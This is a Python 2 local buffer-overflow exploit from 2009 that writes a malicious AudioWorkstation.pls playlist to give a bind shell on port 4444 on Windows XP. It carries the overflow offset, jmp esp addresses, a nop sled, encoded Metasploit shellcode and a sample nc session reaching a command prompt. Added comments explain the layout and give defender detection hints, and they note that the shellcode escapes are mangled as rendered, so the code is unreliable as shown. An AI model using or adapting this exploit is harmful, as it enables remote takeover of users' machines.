# Title : Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit
# Published : 2009-12-09
# Author : mr_me
#!/usr/bin/python
##########################################################
#
# Audio Workstation v6.4.2.4.0 (.pls) Universal Local BoF Exploit
# Credits: germaya_x
# Coded by: mr_me
# Tested on Windows XP SP3
# Note: ** For educational purposes only **
#
###########################################################
#
# mrme@home:~$ nc -v 192.168.0.6 4444
# 192.168.0.6: inverse host lookup failed: Unknown server error :
# Connection timed out
# (UNKNOWN) [192.168.0.6] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Audio Workstation>
#
# Note: There is no need to restrict this exploit
# to XP sp2 as AudioWorkstation.exe contains
# jmp esp addresses that work on XP sp3.
# The addresses that I found using msfpescan:
#
# 0x0105a9b1 jmp esp
# 0x010d1c9a jmp esp
# 0x010f0215 jmp esp
# 0x010f54aa jmp esp
# 0x01102e7e jmp esp
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444, RHOST=
# Payload generator for the Audio Workstation (.pls) stack overflow described
# in the header above. It writes one file, AudioWorkstation.pls, into the
# current working directory, laid out as:
#   1324 filler bytes, a 4-byte return address, 10 nop bytes, the bind-shell
#   payload (sc), then 0xcc padding up to a fixed total of 4000 bytes.
# Python 2 syntax (print statement); the file is opened in text mode ('w').
#
# NOTE(review): as rendered on this page the "xNN" escape sequences have lost
# their backslashes (extraction artefact), so the literals below are plain
# ASCII text rather than the byte values the header describes; the 368-byte
# payload length quoted in the header does not hold for the string as shown.
#
# Defender notes: the generated playlist is a ~4000-byte file with no
# "[playlist]" section header, consisting almost entirely of repeated
# 0x41 / 0x90 / 0xcc bytes plus one encoded blob -- easy to flag in content
# inspection of untrusted playlist files. The return address is a fixed image
# address inside AudioWorkstation.exe (see header), so the technique
# presumably relies on that executable not being ASLR-relocated and on DEP not
# covering the process -- confirm against the build actually deployed.
sc =("x29xc9xb8x47xffxe4x4fxb1x56xddxc3xd9x74x24"
"xf4x5bx31x43x0fx03x43x0fx83xc3x43x1dx11xb3"
"xa3x68xdax4cx33x0bx52xa9x02x19x00xb9x36xad"
"x42xefxbax46x06x04x49x2ax8fx2bxfax81xe9x02"
"xfbx27x36xc8x3fx29xcax13x13x89xf3xdbx66xc8"
"x34x01x88x98xedx4dx3ax0dx99x10x86x2cx4dx1f"
"xb6x56xe8xe0x42xedxf3x30xfax7axbbxa8x71x24"
"x1cxc8x56x36x60x83xd3x8dx12x12x35xdcxdbx24"
"x79xb3xe5x88x74xcdx22x2ex66xb8x58x4cx1bxbb"
"x9ax2exc7x4ex3fx88x8cxe9x9bx28x41x6fx6fx26"
"x2exfbx37x2bxb1x28x4cx57x3axcfx83xd1x78xf4"
"x07xb9xdbx95x1ex67x8axaax41xcfx73x0fx09xe2"
"x60x29x50x6bx45x04x6bx6bxc1x1fx18x59x4exb4"
"xb6xd1x07x12x40x15x32xe2xdexe8xbcx13xf6x2e"
"xe8x43x60x86x90x0fx70x27x45x9fx20x87x35x60"
"x91x67xe5x08xfbx67xdax29x04xa2x6dx6excax96"
"x3ex19x2fx29xd1x85xa6xcfxbbx25xefx58x53x84"
"xd4x50xc4xf7x3excdx5dx60x76x1bx59x8fx87x09"
"xcax3cx2fxdax98x2exf4xfbx9fx7ax5cx75x98xed"
"x16xebx6bx8fx27x26x1bx2cxb5xadxdbx3bxa6x79"
"x8cx6cx18x70x58x81x03x2ax7ex58xd5x15x3ax87"
"x26x9bxc3x4ax12xbfxd3x92x9bxfbx87x4axcax55"
"x71x2dxa4x17x2bxe7x1bxfexbbx7ex50xc1xbdx7e"
"xbdxb7x21xcex68x8ex5exffxfcx06x27x1dx9dxe9"
"xf2xa5xbdx0bxd6xd3x55x92xb3x59x38x25x6ex9d"
"x45xa6x9ax5exb2xb6xefx5bxfex70x1cx16x6fx15"
"x22x85x90x3c")
# 1324 bytes of filler up to the saved return address (the header's offset);
# 0x41 is ASCII 'A'.
buff = 'x41' * 1324 # offset
# Overwrites the saved return address with 0x0105a9b1 (little-endian), the
# first of the "jmp esp" addresses listed in the header.
buff += 'xb1xa9x05x01' # jmp esp
# Short nop sled placed directly after the return address, i.e. where the
# jmp esp above is intended to land.
buff += 'x90' * 10 # nops
buff += sc # shellcode
# Pad to exactly 4000 bytes: 1338 = 1324 + 4 + 10 bytes already emitted.
# 0xcc is the int3 opcode, so any stray execution into the padding traps.
buff += 'xcc' * (4000-1338-len(sc)) # finish buffer
# Silently overwrites any existing AudioWorkstation.pls in the working
# directory; no `with` block, so the handle is closed explicitly below.
exploitme = open('AudioWorkstation.pls','w')
exploitme.write(buff)
exploitme.close()
print "[+] Created exploit file ;)"